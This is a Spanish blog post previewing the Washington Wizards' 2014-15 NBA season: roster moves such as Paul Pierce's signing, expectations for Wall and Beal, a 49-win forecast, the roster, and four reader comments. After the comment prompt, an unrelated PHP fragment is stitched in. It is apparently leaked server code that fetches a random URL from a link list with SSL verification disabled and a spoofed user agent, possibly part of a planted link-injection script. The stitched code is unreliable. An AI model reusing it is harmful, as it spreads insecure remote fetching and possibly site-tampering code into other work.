Washington Wizards 2014-2015: Siguiente nivel

12 de October de 2014 por Ruxixon

¿Irving-Waiters o Wall-Beal? El debate se abrió recientemente tras las declaraciones de Beal en el Media Day, con Waiters recogiendo el guante desde Ohio: ¿quiénes son mejores? Sintomático que ya entren a comparación fortalezas de los Wizards con los nuevos Cavs de LeBron y es que este año el equipo capitalino aparece en las quinielas para intentar hacer algo importante. Los chicos de Randy Wittman, que cayeron la pasada campaña en semis de conferencia frente a Indiana, han llegado para quedarse y amenazan con dar otro paso más. Para ello, han añadido a jugadores que minimizan las limitaciones existentes en su roster. Su juego interior es bastante más completo, con Blair y Humphries como escuderos de Nené-Gortat, y añaden toda la experiencia y talento de un Paul Pierce que sigue dando coletazos en la competición. Importantísima su llegada y es que su carácter ultracompetitivo puede ayudar a que Wall y Beal alcancen su techo y de la mano, confirmar los pronósticos.

Wall y Beal Wizards

Movimientos clave

La importante firma del “Martillo Polaco”, Gortat, garantiza la continuidad del otro dúo, el de la pintura, por lo que Ariza supone la única baja respecto al quinteto de la pasada campaña. El SF volvió a Houston dejando una trade exception por el camino y un hueco importante teniendo en cuenta su rendimiento. Sin embargo, los Wizards ocupan ese vacío fichando a Paul Pierce en uno de los movimientos más sorprendentes del verano. Viaje de Brooklyn a la capital del estado, y leyendo entre líneas, nos indica que Washington es, por lo menos, más favorito que los Nets. Pierce apura sus años en la NBA y de momento no hay un bajón claro en su rendimiento y le da a los Wizards una gran dosis de veteranía que añadir al backcourt. El resto de movimientos han ido enfocados a garantizar los momentos de descanso o de baja de Gortat y/o Nené. Siguen con nuevos contratos Seraphin y Gooden, que se ganó un hueco en el roster tras una gran media temporada en el equipo, y llegan nuevos DeJuan Blair, por el cual se intercambiaron los derechos de Emir Preldzic, y Humphries, usando la trade exception comentada anteriormente. Por último hay que comentar la firma de otro que sigue, Temple, que recogerá los minutos que dejen Wall y Miller.

Qué esperamos de ellos

Hay muchas ganas de ver el siguiente nivel de Wall y Beal. El primero cosechó la mejor temporada de su carrera, cometiendo menos errores en la conducción y en el tiro, aunque en los PO volvieron los fantasmas. Le falta romper en ese jugador dominante que todo el mundo vaticinaba que sería cuando se presentó al draft de 2010. Es una versión que todavía no ha mostrado y que tras 4 años en la NBA, en plena madurez, toca ver. Por su parte Beal está en una proyección vertiginosa y podemos estar hablando del mejor SG del este esta misma temporada. El juego interior también repite, al menos en titulares, así que sabemos lo que pueden dar. Si acaso se mejora la rotación con Blair y Humphries, dando más garantías al equipo. Las dudas pueden venir en el puesto de alero. No dudamos de Pierce en el apartado ofensivo, más cuando hay muchas opciones para generar anotación dentro del 5 inicial. Sin embargo, sus piernas pueden sufrir a la hora defender al SF rival y ahí sí que se notará lo que daba Ariza al equipo. Además no es lo ideal que Pierce juegue más de 30 minutos por noche en una temporada de 100 partidos, por lo que cobra mucha importancia el rendimiento de la segunda línea exterior del equipo, principalmente en el SF. Más crítica si cabe en la situación en la que se produzca alguna lesión del backcourt titular. Quizás por ahí tengamos las mayores dudas de Washington a la hora de afrontar esta temporada.

Pronóstico

Sin el Big 3 de Miami se abre un nuevo horizonte en su división, y son posiblemente los máximos favoritos para comandarla aunque eso sí, el nivel de igualdad es grande. Les damos 49 victorias, entre los 4 primeros de conferencia y semifinales en Playoffs. Luego Bulls y Cavaliers son los máximos favoritos del Este. Les veo con posibilidades de eliminar a Cleveland (con su roster actual) así que, dependiendo de por qué lado del cuadro vayan los Wizards, podrían llegar hasta la final de conferencia.

Plantilla

PG: John Wall, Andre Miller, Garrett Temple.
SG: Bradley Beal, Glenn Rice Jr.
SF: Paul Pierce, Martell Webster, Otto Porter Jr.
PF: Nené Hilario, Kris Humphries, Drew Gooden.
C: Marcin Gortat, DeJuan Blair, Kevin Seraphin.

Bajas: Trevor Ariza (HOU), Trevor Booker (UTA), Al Harrington (Fujian Xunxing – China), Chris Singleton (IND)

Comenta

4 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    Lo comentamos en la previa y ya tenemos la primera en la frente,Beal lesionado en su muñeca izquierda.Según apuntan los medios yankees necesario su paso por quirófano estableciendo su vuelta a las canchas de 6 a 8 semanas.No será la única baja para el inicio de la RS frente a los Heat,ya que tras la pelea entre Pierce y Noah,Nene y Blair han sido sancionados con 1 partido por abandonar la zona del banquillo.

      Citar

  2. TheDeerHunter dice:
    #2

    Sí tiene buena pinta el equipo, ciertamente.
    Una lástima la nueva lesión de Beal, que tiene excesiva tendencia a romperse.

      Citar

  3. Txusma dice:
    #3

    Para mí, los tapados del Este tras Cleveland y Chicago, como dice el análisis. Faltará que se mantengan sanos (Beal ya se nos ha roto) para poder luchar por esa final de conferencia.

      Citar

  4. Jose A. Ramírez dice:
    #4

    Es un clarisimo contender en el este, muy equilibrado en todas sus posiciones y un banco con ciertas garantias, mucho mejor que el de cleveland. Pienso que Wittman no es el tecnico indicado para este proyecto ambicioso que tratan de impulsar desde la capital ( ya era hora despues de tantos años ) pero si las lesiones no afectan mucho pueden hacer saltar la banca, Pierce en play-offs les hara estar en otro nivel, las dudas son esas, lesiones de jugadores muy propensos a ello, un pivot que les diese algo mas desde el banco y poco mas. Hay que seguir la evolucion de Porter y Glen Rice Jr, pueden ser factores diferenciales. A mi parecer si estos dos cumplen a poco su mejoria y Webster hace su tarea no deberian resentirse demasiado en los descansos de The Truth. Excelente analisis y con ganas de ver a los wizards y a todos, que ganas de que empiece, es tremendo todo lo nuevo que hay por ver esta temporada con tantos movimientos en verano.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>